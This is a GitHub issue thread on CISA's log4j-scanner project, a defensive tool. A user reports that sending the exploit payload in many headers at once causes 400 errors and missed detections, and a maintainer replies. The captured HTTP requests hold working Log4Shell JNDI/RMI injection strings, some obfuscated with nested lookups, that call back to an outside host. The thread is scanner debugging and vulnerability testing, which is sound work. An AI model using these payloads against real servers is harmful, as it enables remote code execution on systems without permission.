cisagov / log4j-scanner

log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
1.28k stars 215 forks source link

headers.txt and headers-large.txt cause false negatives #10

Closed GO0dspeed closed 2 years ago

GO0dspeed commented 2 years ago

🐛 Summary

When using log4j-scanner.py with headers.txt and headers-large.txt some servers will respond with a 400 bad request and payloads will not call back on otherwise vulnerable servers.

To reproduce

Steps to reproduce the behavior:

  1. Begin tcpdump or wireshark pcap
  2. Run log4j-scanner.py against a known vulnerable host
  3. If results are negative - observe PCAP for HTTP 400 bad request errors
  4. run log4j-scanner.py with a limited headers.txt (tested with 6 headers including Referer)
  5. Callback should work - PCAP reflects 200 Okay on HTTP requests

Expected behavior

Callbacks to happen

Any helpful log output or screenshots

bad request:

2696
GET / HTTP/1.1
Host: <redacted>:8081
User-Agent: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Encoding: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept: */*
Connection: keep-alive
Referer: https://${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
X-Api-Version: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Charset: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
Accept-Datetime: ${${lower:${lower:jndi}}:${lower:rmi}://<redacted>:25007/6ytk14i}
..snip
HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=iso-8859-1
Content-Length: 54
Connection: close

<h1>Bad Message 400</h1><pre>reason: Bad Request</pre>

Successful trimmed request generates a callback (one header):

215
GET /oauth?state=%2F HTTP/1.1
Host: <redacted>:8081
User-Agent: ${jndi:rmi://<redacted>:25008/vulnerable}                                                                               
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

                                                                                                                                                                   711
HTTP/1.1 200 OK
GO0dspeed commented 2 years ago

Potentially updating code to loop through the headers in the scan_url function instead of using all headers at once can potentially help the issue - although it will increase scan time.

genericcontributor commented 2 years ago

@GO0dspeed Thanks for the reminder. I've updated the README to reflect the false negative possibilities.

We are tossing that idea in the air right now. Potentially adding a flag to submit the headers one at a scan with a BIG disclaimer that will increase time complexity by O(n^2) and could take significantly longer if given a large list of URLS + Headers.